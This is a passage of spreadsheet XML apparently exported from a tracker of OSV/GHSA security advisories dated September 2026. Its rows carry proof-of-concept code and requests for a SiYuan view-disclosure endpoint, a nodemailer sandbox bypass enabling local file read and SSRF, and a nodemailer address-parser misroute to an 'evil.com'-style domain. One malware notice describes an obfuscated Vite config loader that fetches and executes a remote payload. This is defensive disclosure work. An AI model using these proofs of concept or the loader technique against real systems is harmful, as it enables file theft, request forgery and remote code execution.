t="inlineStr"><is><t>New</t></is></c><c r="C1659" s="5" t="inlineStr"><is><t>GHSA-57v5-wqx3-cgj4</t></is></c><c r="D1659" s="5" t="inlineStr" /><c r="E1659" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1659" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1659" s="5" t="inlineStr" /><c r="H1659" s="5" t="inlineStr" /><c r="I1659" s="5" t="inlineStr" /><c r="J1659" s="5" t="inlineStr" /><c r="K1659" s="5" t="inlineStr" /><c r="L1659" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M1659" s="5" t="inlineStr"><is><t>0.0.0-20260726004013-64c26e74bb82</t></is></c><c r="N1659" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1659" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1659" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1659" s="5" t="inlineStr" /><c r="R1659" s="5" t="inlineStr" /><c r="S1659" s="5" t="inlineStr"><is><t>### Scope note (please read first)

This endpoint does not exist in v3.7.3 or on master. It was introduced on the development branch by commit `acfc02ee8` ("Improve database field visibility across views", #11020) and is live on `v3.7.4-alpha.1`, so it will ship in v3.7.4 unless gated first. No released stable version is affected.

### Summary

`/api/av/getAttributeViewFieldViews` is registered with `CheckAuth` only and applies no publish-access filtering. Given a database `avID`, it returns the complete view structure of that database: every view's name, icon, layout type and the per-field `Hidden` flag, regardless of whether the caller is authorized to see that database or those views.

The route registered immediately before it, `getAttributeViewKeys`, does gate reader roles.

### Details

| Item | Detail |
|---|---|
| Route | `kernel/api/router.go:530` `POST /api/av/getAttributeViewFieldViews` → `model.CheckAuth` → `getAttributeViewFieldViews` |
| Middleware | `CheckAuth` only, no `CheckReadonly`, no `CheckAdminRole` |
| Guard in handler | None. Greps for `IsReadOnlyRoleContext`, `publishAccess` and `Filter*` all return zero matches |
| Exposed | For each entry in `attrView.Views`: `ID`, `Icon`, `Name`, `Type`, and the `Hidden` flag for the requested field |
| Introduced by | `acfc02ee8` (feature), dev branch only |

**The leak path.** The handler binds `avID` and `keyID`, validating them against the ID pattern only, then calls `GetAttributeViewFieldViews(avID, keyID)`. That function calls `av.ParseAttributeView(avID)`, which reads the database's storage file directly by identifier. There is no ownership check and no publish-access check anywhere on the path. The result is a per-view record for every view the database defines.

What a reader learns is author-written: view names are typed by the user, and layout type distinguishes a table from a gallery or kanban. The `Hidden` flag additionally reveals, per view, which fields the author chose to conceal.

**Guarded sibling, one route earlier.** `getAttributeViewKeys` (`kernel/api/router.go:529`) is also reader-reachable and does gate:

```go
if model.IsReadOnlyRoleContext(c) {
    blockAttributeViewKeys = model.FilterBlockAttributeViewKeysByPublishAccess(c, publishAccess, ...)
}
```

The new route at 530 applies nothing equivalent.

This is worth flagging as more than an isolated omission. `acfc02ee8` added a new reader-reachable attribute-view endpoint during the same development cycle in which the surrounding attribute-view endpoints were being hardened. The same pattern produced an earlier exposure: `f2d966659`, which added encrypted-notebook unlock status for plugin consumption, created a reader-reachable disclosure on a surface that was otherwise being tightened. A check on new reader-reachable routes against the gating applied to their registered neighbours would catch this class before release.

**Reachability, stated honestly.** The endpoint requires a valid `avID` and `keyID`. `renderAttributeView` supplies both to a reader for any database embedded in a document the reader can access. The realistic target is therefore a partially-published database: the document publishes one view, and this endpoint enumerates the existence, name, layout type and hidden-field configuration of the database's other views, including views the author did not publish. Against a database with no reader-accessible surface at all, obtaining the identifiers is harder, particularly since the `getAttributeViewKeysByID` enumeration path was closed on the development branch. The severity below reflects that constraint rather than a worst case.

### Proof of Concept

Precondition: `v3.7.4-alpha.1` build, publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. A database embedded in a reader-accessible document, with at least one additional view that is not published.

Step 1, obtain the identifiers through the reader-accessible path:

```
POST http://127.0.0.1:6808/api/av/renderAttributeView
{"id":"&lt;block id of the embedded database in a published doc&gt;"}

→ 200, returns the published view together with its key identifiers
```

Step 2, enumerate the rest of the database's views:

```
POST http://127.0.0.1:6808/api/av/getAttributeViewFieldViews
{"avID":"&lt;avID from step 1&gt;","keyID":"&lt;keyID from step 1&gt;"}

→ 200, returns a record per view: ID, Icon, Name, Type, Hidden
```

The response includes views that were never published, disclosing their author-written names, their layout types, and which field is hidden in each.

### Impact

An anonymous reader in publish mode, or any publish `RoleReader`, can enumerate the full view structure of a database when only part of that database is published. View names are author-written free text and frequently describe the data they filter, so this discloses the existence and subject matter of unpublished views. The per-field `Hidden` flags additionally reveal the author's concealment choices across those views. Confidentiality only, with no integrity or availability impact, and bounded by the reader needing identifiers obtainable from a reader-accessible database.

### Suggested fix

Gate the handler for read-only roles, mirroring `getAttributeViewKeys`: when `IsReadOnlyRoleContext(c)` holds, resolve the block that owns the `avID` and apply the publish-access check before returning any view record, or filter the returned set through the same `FilterBlockAttributeViewKeysByPublishAccess` path its neighbour uses.</t></is></c><c r="T1659" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-57v5-wqx3-cgj4</t></is></c></row><row r="1660"><c r="A1660" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1660" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1660" s="5" t="inlineStr"><is><t>GHSA-8m3c-c648-2xjj</t></is></c><c r="D1660" s="5" t="inlineStr" /><c r="E1660" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1660" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1660" s="5" t="inlineStr" /><c r="H1660" s="5" t="inlineStr" /><c r="I1660" s="5" t="inlineStr" /><c r="J1660" s="5" t="inlineStr" /><c r="K1660" s="5" t="inlineStr" /><c r="L1660" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1660" s="5" t="inlineStr"><is><t>9.1.1</t></is></c><c r="N1660" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1660" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1660" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1660" s="5" t="inlineStr" /><c r="R1660" s="5" t="inlineStr" /><c r="S1660" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's `disableFileAccess` / `disableUrlAccess` options are a security sandbox that lets an application forbid untrusted message content (`html`/`text`/attachment `path`/`href`) from reading local files or making outbound HTTP(S) requests. The fix for GHSA-wqvq-jvpq-h66f (commit `5f69497`) threaded these flags through the library's internal resolution paths (`MailMessage.resolveAll()` and `_convertDataImages()`), but the public plugin API `MailMessage.resolveContent(...args)` (`lib/mailer/mail-message.js:41-43`) remains a raw passthrough to `shared.resolveContent()`.

When called with the documented legacy signature `mail.resolveContent(data, key, callback)`, `shared.resolveContent` normalizes the missing options argument to an empty object (`options = options || {}`, `lib/shared/index.js:530`). The message-level flags that the `MailMessage` constructor already copied into `mail.data` (`lib/mailer/mail-message.js:34-38`) are silently discarded, so `resolveContentValue` skips both access-control guards and reaches `nmfetch(url)` (SSRF, `lib/shared/index.js:588`) or `fs.createReadStream(path)` (arbitrary file read, `lib/shared/index.js:597`).

A plugin or application code that resolves message content through the documented API (the same API the library's own `_convertDataImages` uses, threading the flags explicitly) thereby bypasses the sandbox an application deliberately enabled.

### Details

Root cause. The `MailMessage` constructor stores the transporter-level sandbox flags on the message object (`lib/mailer/mail-message.js:34-38`):

```js
['disableFileAccess', 'disableUrlAccess', 'normalizeHeaderKey', 'maxRecipients'].forEach(key =&gt; {
    if (key in options) {
        this.data[key] = options[key];
    }
});
```

The public resolver is a pure passthrough (`lib/mailer/mail-message.js:41-43`):

```js
resolveContent(...args) {
    return shared.resolveContent(...args);
}
```

`shared.resolveContent` supports the legacy 3-argument signature and collapses the missing options to `{}` (`lib/shared/index.js:524-530`):

```js
module.exports.resolveContent = (data, key, options, callback) =&gt; {
    // options is optional; support the legacy resolveContent(data, key, callback) signature
    if (!callback &amp;&amp; typeof options === 'function') {
        callback = options;
        options = false;
    }
    options = options || {};
    ...
    resolveContentValue(data, key, options, callback);
```

`resolveContentValue` then checks `options.disableUrlAccess` / `options.disableFileAccess` (`lib/shared/index.js:581` / `:590`), both `undefined` for the legacy signature, so it falls through to `nmfetch` (`:588`) or `fs.createReadStream` (`:597`).

Contrast with the fixed paths. `resolveAll()` (`lib/mailer/mail-message.js:112-115`) and `_convertDataImages()` (`lib/mailer/index.js:437-440`) both pass the message flags explicitly. The MIME streaming path (`lib/mime-node/index.js:1059-1077`) also honors the flags. So an application that enables the sandbox and then calls `transporter.sendMail()` is protected; the bypass appears only when message content is resolved through the public legacy-signature API — which is the documented plugin usage (the `resolveContent` JSDoc at `lib/shared/index.js:510-523` states it is "useful when you want to create a plugin that needs a content value").

Affected versions. Confirmed on `9.1.0` (HEAD `efd6e29c10c6e0c25c57bd2f2a71302838235a4f`, the current npm latest). The gap was introduced by the GHSA-wqvq-jvpq-h66f fix and is still present; the public API has no regression coverage (`test/mailer/mail-message-test.js` contains no `resolveContent` test).

### PoC

Requires: `nodemailer@9.1.0`, a readable local file, and any reachable HTTP endpoint (loopback suffices). Non-destructive; no network egress beyond a local listener.

```js
'use strict';
const nodemailer = require('nodemailer');
const MailMessage = require('nodemailer/lib/mailer/mail-message');

const TARGET_FILE = '/app/src/package.json';   // any readable local file
const SSRF_URL = 'http://http-sink:8080/poc-ssrf'; // any local/internal HTTP target

const transporter = nodemailer.createTransport({
    streamTransport: true,
    disableFileAccess: true,   // sandbox explicitly enabled
    disableUrlAccess: true
});

const data = {
    from: 'a@example.com', to: 'b@example.com', subject: 'poc', text: 'hello',
    html: { path: TARGET_FILE },
    attachments: [{ filename: 'x.bin', href: SSRF_URL }]
};
const mail = new MailMessage(transporter, data);
// mail.data.disableFileAccess === true, mail.data.disableUrlAccess === true

// Documented legacy plugin signature — options argument omitted:
mail.resolveContent(mail.data, 'html', (err, value) =&gt; {
    if (err) return console.log('BLOCKED', err.code);
    console.log('FILE_READ_OK len=', value.length);          // -&gt; 1647 (package.json)
});
mail.resolveContent(mail.data.attachments, 0, (err, body) =&gt; {
    if (err) return console.log('BLOCKED', err.code);
    console.log('URL_FETCH_OK body=', body.toString());      // -&gt; fetched response
});
```

Observed output on the audit environment (Node 22, `nodemailer@9.1.0`):

```text
mail.data.disableFileAccess = true | disableUrlAccess = true
[CONTROL resolveAll] err = EFILEACCESS : File access rejected for /app/src/package.json
[CONTROL html.path explicit-options] err = EFILEACCESS
[BYPASS html.path legacy] READ OK len = 1647 head = "{\n    \"name\": \"nodemailer\",\n    \"version\": \"9.1.0\",\n    \"des"
[BYPASS att[0].href legacy] FETCH OK len = 13 body = "HTTP-SINK OK\n"
```

The negative controls (`resolveAll`, and `resolveContent` with explicit `{ disableFileAccess: true }`) return `EFILEACCESS`, proving the sandbox works on the protected paths and only the legacy-signature passthrough is bypassed. The same bypass reproduces inside a real `transporter.sendMail()` flow when a `compile` plugin calls `mail.resolveContent(mail.data, 'html', cb)` / `mail.resolveContent(mail.data.attachments, 0, cb)`.

### Impact

An application that enables `disableFileAccess` / `disableUrlAccess` to contain untrusted message content and that resolves content through the documented plugin API (`mail.resolveContent(data, key, callback)`) has its sandbox silently bypassed:

- Arbitrary local file disclosure: a message `html`/attachment `path` pointing at a server file (`/etc/passwd`, `.env`, key material) is read and returned to the caller / delivered in the message.
- Server-side request forgery: a message `href` pointing at an internal or loopback URL is fetched from the application host.

Reachability precondition: the sandbox flags must be enabled (default off) and the application or its plugin must invoke the documented legacy-signature API on attacker-influenced data. The default `transporter.sendMail()` path remains protected, so this is a defense-in-depth gap in the library's own access-control enforcement rather than a default-flow bypass. It is the same vulnerability class as the previously accepted GHSA-wqvq-jvpq-h66f (CVE-2026-82660) and GHSA-p6gq-j5cr-w38f (CVE-2026-82659), on a distinct third code path.</t></is></c><c r="T1660" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-8m3c-c648-2xjj</t></is></c></row><row r="1661"><c r="A1661" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1661" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1661" s="5" t="inlineStr"><is><t>GHSA-8rcc-9ggm-659p</t></is></c><c r="D1661" s="5" t="inlineStr" /><c r="E1661" s="5" t="inlineStr" /><c r="F1661" s="5" t="inlineStr" /><c r="G1661" s="5" t="inlineStr" /><c r="H1661" s="5" t="inlineStr" /><c r="I1661" s="5" t="inlineStr" /><c r="J1661" s="5" t="inlineStr" /><c r="K1661" s="5" t="inlineStr" /><c r="L1661" s="5" t="inlineStr"><is><t>npm:@usemosaik/template-react-js</t></is></c><c r="M1661" s="5" t="inlineStr" /><c r="N1661" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1661" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1661" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1661" s="5" t="inlineStr" /><c r="R1661" s="5" t="inlineStr" /><c r="S1661" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3174ac7cecbc1869ae5ac87ea585de744f6b7d17b8c089b746384c2b7e2355a3)
This template package ships files/vite.config.js which, after a benign Vite header, appends ~26KB of heavily obfuscated code (obfuscator.io-style string-array with rotation dispatcher, hex payloads XOR-decoded at runtime with key 0xA2, arithmetic-hidden numeric literals). When the scaffolded project is run via `vite` / `npm run dev`, the config executes a `run()` routine that queries Ethereum JSON-RPC endpoints (`eth_getBlockByNumber`, `eth_getTransactionCount`) against a hardcoded sender address to resolve a command-and-control IP hidden in on-chain transaction data, fetches an XOR-encrypted payload over HTTP, decrypts it, and passes it to both `eval(...)` and `spawn('node', ['-e', payload], {detached: true, stdio: 'ignore', windowsHide: true})`, yielding a hidden detached Node process on the developer's machine. The package's declared `main` (dist/index.js) is inert, so scanners inspecting only the entry point miss the payload; the obfuscation and EtherHiding indirection exist solely to conceal the remote-execution chain from static review. Execution fires the first time a developer runs the scaffolded project generated from this template, giving full RCE on the developer's host.

## Source: ghsa-malware (9cb614be24802762692ee3d58173981e3c20bdebe4fabd6846ab71671568d4ca)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1" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16047</t></is></c></row><row r="1662"><c r="A1662" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1662" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1662" s="5" t="inlineStr"><is><t>GHSA-9cfw-xh4g-cc2f</t></is></c><c r="D1662" s="5" t="inlineStr" /><c r="E1662" s="5" t="inlineStr" /><c r="F1662" s="5" t="inlineStr" /><c r="G1662" s="5" t="inlineStr" /><c r="H1662" s="5" t="inlineStr" /><c r="I1662" s="5" t="inlineStr" /><c r="J1662" s="5" t="inlineStr" /><c r="K1662" s="5" t="inlineStr" /><c r="L1662" s="5" t="inlineStr"><is><t>npm:i18nexus-tools</t></is></c><c r="M1662" s="5" t="inlineStr" /><c r="N1662" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1662" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1662" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1662" s="5" t="inlineStr" /><c r="R1662" s="5" t="inlineStr" /><c r="S1662" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (558344f06c374c5eff9c870250d63a5e9f784ffe23f91182154d9c66c441ee0b)
The package was found to contain malicious code or consuming dependency that contains malicious code

## Source: ghsa-malware (4708373dfb7211317f4ebae7bd11027043840e6db7a9f2d9aa3385611a2fdad8)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2" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16046</t></is></c></row><row r="1663"><c r="A1663" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1663" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1663" s="5" t="inlineStr"><is><t>GHSA-cc9r-2j5m-2m83</t></is></c><c r="D1663" s="5" t="inlineStr" /><c r="E1663" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1663" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1663" s="5" t="inlineStr" /><c r="H1663" s="5" t="inlineStr" /><c r="I1663" s="5" t="inlineStr" /><c r="J1663" s="5" t="inlineStr" /><c r="K1663" s="5" t="inlineStr" /><c r="L1663" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1663" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N1663" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1663" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1663" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1663" s="5" t="inlineStr" /><c r="R1663" s="5" t="inlineStr" /><c r="S1663" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's email-address parser treats an **RFC 5322 comment** `( ... )` inside the domain as a point to **concatenate** the surrounding text, rather than as folding whitespace (CFWS) that **terminates** the domain. Consequently a recipient address such as `user@good-corp.com(x)evil.com` is parsed and **delivered to `good-corp.comevil.com`** (registrable domain `comevil.com`, attacker‑controlled), while a conformant RFC 5322 parser terminates the domain at the comment and reads `good-corp.com`.

An application that decides *whether it is allowed to email a recipient* by parsing/validating the recipient's domain — with a strict RFC 5322 parser (used without inspecting parse defects) or with a naive prefix/substring allow‑list — and then hands the raw address to Nodemailer for delivery, can be induced to send mail to a domain the attacker controls. This is an **Interpretation Conflict (CWE‑436)**, the same class as CVE‑2025‑13033, reached through the RFC 5322 *comment* construct (the "Comments" technique in PortSwigger's *Splitting the email atom* research, which produced a Postfix fix).

Severity is **Moderate**: exploitation requires the app's domain check to disagree with Nodemailer (see **Impact** for exactly which parsers do and do not). Verified end‑to‑end against a real RFC 5321 SMTP server (nodemailer 9.0.6 → `aiosmtpd`).

### Details

Root cause is in `lib/addressparser/index.js`.

1. The tokenizer registers the comment as an operator pair (`Tokenizer.operators`):
   ```js
   '(': ')',            // line ~331
   ```
2. When the **closing** `)` is immediately followed by a non‑break character (anything other than space / tab / CR / LF / `,` / `;`), the tokenizer marks that operator token with `noBreak = true`:
   ```js
   // Tokenizer.checkChar, lines ~398-399
   if (nextChr &amp;&amp; ![' ', '\t', '\r', '\n', ',', ';'].includes(nextChr)) {
       this.node.noBreak = true;
   }
   ```
3. `_handleAddress` then **glues** the token that follows the comment onto the token that preceded it (dropping the comment):
   ```js
   // _handleAddress, lines ~187-188
   if (prevToken &amp;&amp; prevToken.noBreak &amp;&amp; data[state].length) {
       data[state][data[state].length - 1] += token.value;   // &lt;-- concatenation
   }
   ```

For the input `user@good-corp.com(x)evil.com` the tokens are `text:"user@good-corp.com"`, `op:"("`, `text:"x"`, `op:")"` (flagged `noBreak`), `text:"evil.com"`. Step 3 appends `evil.com` onto `user@good-corp.com`, producing the single domain **`good-corp.comevil.com`**. The comment content (`x`) is discarded into the display‑name field.

RFC 5322 defines a comment as CFWS — semantically folding whitespace — and it may **not** appear inside a `dot-atom`. A comment therefore *separates* tokens and terminates the domain; the conformant reading of `good-corp.com(x)evil.com` is the domain `good-corp.com` (with the trailing `evil.com` being invalid/ignored). Nodemailer instead concatenates the two atoms across the removed comment, yielding a different, attacker‑registrable domain.

Nodemailer uses the parsed address for **both** the SMTP envelope (`getEnvelope()` → `RCPT TO`) and the emitted `To:`/`From:` headers, so the entire message is routed to the concatenated domain.

**Related grammar defect (bonus, lower impact):** nested comments are legal in RFC 5322, but the tokenizer closes the comment at the *first* `)` (`chr === this.operatorExpecting`, line ~392), so a valid nested comment such as `user@x.com(a(b)c)` is mis‑balanced and mangled to `x.comc)`. That particular output contains a stray `)` and is **rejected** by a conformant MTA (501) — a bounce/robustness issue, not a misroute.

**Suggested fix:** treat a comment as folding whitespace that terminates the current token — i.e. do **not** propagate `noBreak` across a comment‑closing `)` (restrict the `noBreak` optimization to quoted‑string closes), and support nested comments per RFC 5322. Equivalently, never emit a domain formed by concatenating two atoms that were separated only by a comment.

### PoC

Environment: Node.js ≥ 18 and the published `nodemailer@9.0.6`. No special transport configuration is required; the discrepancy is in address parsing.

`poc-comment.js`:
```js
'use strict';
const net = require('net');
const nodemailer = require('nodemailer'); // 9.0.6

const TRUSTED   = 'good-corp.com';
const RECIPIENT = 'user@good-corp.com(x)evil.com'; // RFC 5322 comment (x) between two domains

//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'app@good-corp.com', to: RECIPIENT, subject: 'hi', text: 'x' });
  t.close(); server.close();
});
```

Run:
```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-comment.js
```

Actual output (nodemailer 9.0.6):
```
nodemailer transmits : RCPT TO:&lt;user@good-corp.comevil.com&gt;
```

The application asked to mail `user@good-corp.com(x)evil.com`; Nodemailer delivers to `good-corp.comevil.com` — registrable domain `comevil.com`, which an attacker can register.

**Verified against a real RFC 5321 server** (containerized lab included with this report — `docker compose up --build`, case `R8_comment_glue`, receiver = `aiosmtpd`):
```
wire RCPT TO                     : RCPT TO:&lt;user@good-corp.comevil.com&gt;
real server                      : ACCEPTED (250)
recipient parsed by real server  : user@good-corp.comevil.com   (domain good-corp.comevil.com)
delivered To header              : x &lt;user@good-corp.comevil.com&gt;
```

**Which parser sees what** (the crux of exploitability):

| Parser used by the application to gate/route | Domain it reads from `user@good-corp.com(x)evil.com` | Deceived? |
|---|---|---|
| Python `email.policy.default` (strict RFC 5322) | `good-corp.com` *(flags `InvalidHeaderDefect`)* | Yes, if defects are not checked |
| Naive prefix / substring allow‑list (`startsWith`/`includes('@good-corp.com')`) | `good-corp.com` | Yes |
| Nodemailer's own `addressparser` | `good-corp.comevil.com` | No |
| Python `email.utils.getaddresses` | `good-corp.comevil.com` | No |
| WHATWG `url.domainToASCII` | `good-corp.com(x)evil.com` | No |

### Impact



* **Who is impacted:** applications that make a security or routing decision on the recipient **domain** using a parser that terminates the domain at the comment, while relying on Nodemailer for delivery — specifically those that validate with a strict RFC 5322 parser **without inspecting parse defects**, or with a **prefix/substring/allow‑list** check (e.g. "only send to `@good-corp.com`", employee‑only flows, "same‑tenant" routing). Applications that validate with Nodemailer's own `addressparser`, `email.utils.getaddresses`, or `url.domainToASCII` are **not** affected, which is why this is rated below the IDN/Punycode issue.

## Patched in 9.1.0

Fixed in [902b63e](https://github.com/nodemailer/nodemailer/commit/902b63e).

Not propagating `noBreak` across the closing `)` on its own breaks valid addresses, because CFWS is legal on either side of the `@`: `user@(x)good-corp.com` and `user(x)@good-corp.com` both come out mangled. A comment now joins what it separates only when one side carries the `@`, so those keep resolving while `user@good-corp.com(x)evil.com` terminates at `good-corp.com`.

Quoted-string and angle-address joining are unchanged. Nested comments are still not modelled, but the misroute is gone: `user@x.com(a(b)c)` now yields `user@x.com`.</t></is></c><c r="T1663" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-cc9r-2j5m-2m83</t></is></c></row><row r="1664"><c r="A1664" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1664" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1664" s="5" t="inlineStr"><is><t>GHSA-f4f2-cqqp-jcrx</t></is></c><c r="D1664" s="5" t="inlineStr" /><c r="E1664" s="5" t="inlineStr" /><c r="F1664" s="5" t="inlineStr" /><c r="G1664" s="5" t="inlineStr" /><c r="H1664" s="5" t="inlineStr" /><c r="I1664" s="5" t="inlineStr" /><c r="J1664" s="5" t="inlineStr" /><c r="K1664" s="5" t="inlineStr" /><c r="L1664" s="5" t="inlineStr"><is><t>npm:@web2apk/baileys</t></is></c><c r="M1664" s="5" t="inlineStr" /><c r="N1664" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1664" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1664" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1664" s="5" t="inlineStr" /><c r="R1664" s="5" t="inlineStr" /><c r="S1664" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (1ad4c3329ebb2fdeb3b9ddc93abcb5f3dab6773f7a7999ff96d063d49edc04d9)
The package was found to contain malicious code or consuming dependency that contains malicious code

## Source: ghsa-malware (23d279de5770039164036b3717fa8188b73601e773d8647f1a4e1b6ac59c5a17)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4" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16043</t></is></c></row><row r="1665"><c r="A1665" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1665" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1665" s="5" t="inlineStr"><is><t>GHSA-j95f-988m-3j2f</t></is></c><c r="D1665" s="5" t="inlineStr" /><c r="E1665" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1665" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1665" s="5" t="inlineStr" /><c r="H1665" s="5" t="inlineStr" /><c r="I1665" s="5" t="inlineStr" /><c r="J1665" s="5" t="inlineStr" /><c r="K1665" s="5" t="inlineStr" /><c r="L1665" s="5" t="inlineStr"><is><t>npm:@tiptap/core</t></is></c><c r="M1665" s="5" t="inlineStr"><is><t>3.30.5</t></is></c><c r="N1665" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1665" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1665" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1665" s="5" t="inlineStr" /><c r="R1665" s="5" t="inlineStr" /><c r="S1665" s="5" t="inlineStr"><is><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is></c><c r="T1665" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f</t></is></c></row><row r="1666"><c r="A1666" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1666" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1666" s="5" t="inlineStr"><is><t>GHSA-mqvm-gmc4-6rv2</t></is></c><c r="D1666" s="5" t="inlineStr" /><c r="E1666" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1666" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1666" s="5" t="inlineStr" /><c r="H1666" s="5" t="inlineStr" /><c r="I1666" s="5" t="inlineStr" /><c r="J1666" s="5" t="inlineStr" /><c r="K1666" s="5" t="inlineStr" /><c r="L1666" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M1666" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N1666" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1666" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1666" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1666" s="5" t="inlineStr" /><c r="R1666" s="5" t="inlineStr" /><c r="S1666" s="5" t="inlineStr"><is><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is></c><c r="T1666" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2</t></is></c></row><row r="1667"><c r="A1667" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1667" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1667" s="5" t="inlineStr"><is><t>GHSA-q72m-f2r4-w4cw</t></is></c><c r="D1667" s="5" t="inlineStr" /><c r="E1667" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1667" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1667" s="5" t="inlineStr" /><c r="H1667" s="5" t="inlineStr" /><c r="I1667" s="5" t="inlineStr" /><c r="J1667" s="5" t="inlineStr" /><c r="K1667" s="5" t="inlineStr" /><c r="L1667" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M1667" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N1667" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1667" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1667" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1667" s="5" t="inlineStr" /><c r="R1667" s="5" t="inlineStr" /><c r="S1667" s="5" t="inlineStr"><is><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is></c><c r="T1667" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw</t></is></c></row><row r="1668"><c r="A1668" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1668" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1668" s="5" t="inlineStr"><is><t>GHSA-rgj7-g3m4-5g8c</t></is></c><c r="D1668" s="5" t="inlineStr" /><c r="E1668" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1668" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1668" s="5" t="inlineStr" /><c r="H1668" s="5" t="inlineStr" /><c r="I1668" s="5" t="inlineStr" /><c r="J1668" s="5" t="inlineStr" /><c r="K1668" s="5" t="inlineStr" /><c r="L1668" s="5" t="inlineStr"><is><t>npm:sharp</t></is></c><c r="M1668" s="5" t="inlineStr"><is><t>0.35.4</t></is></c><c r="N1668" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1668" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1668" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1668" s="5" t="inlineStr" /><c r="R1668" s="5" t="inlineStr" /><c r="S1668" s="5" t="inlineStr"><is><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is></c><c r="T1668" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c</t></is></c></row><row r="1669"><c r="A1669" s="5" 